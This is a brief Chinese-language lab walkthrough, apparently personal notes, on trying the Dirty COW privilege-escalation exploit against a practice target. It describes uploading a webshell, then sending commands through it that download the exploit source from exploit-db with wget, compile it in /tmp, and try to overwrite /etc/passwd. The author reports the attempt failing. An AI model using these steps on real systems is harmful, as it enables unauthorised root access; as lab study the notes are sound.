refer to:
https://www.exploit-db.com/exploits/40839
1. 上传webshell.php 到靶机
2. 看一下这个: exploit-db.com 的内容,注意要搜索 dirty , 而不是搜索cve
3. 进入到该 漏洞的细节页面:
可以看到基本的用法为:
4. 使用postman 进行基本操作
cmd: wget https://www.exploit-db.com/download/40839 -O /tmp/dirty-cow-0118.c cmd: ls /tmp -al cmd: chmod 777 /tmp/dirty-cow-0118.c cmd: gcc -pthread /tmp/dirty-cow-0118.c -o /tmp/dirty-cow-0118 -lcrypt cmd: ls /tmp -al
然后执行该文件,会发现好久没出现response (需要等待)
此时,从root的视角来看, CPU占用基本慢了:(我的是1core 1g 的机器) 所以最好在postman中设置好timeout, 设置大些
大概3分钟后, 看到结果:
不过 貌似没生效。不要紧了,先这样。这个靶机是 2023年1月购买的,非常新,所以没生效是非常正常的。
(看起来 跟文件有关系, /etc/passwd 太敏感,写入失败,估计有进程在保护。)
我们随便创建一个文件:/etc/hi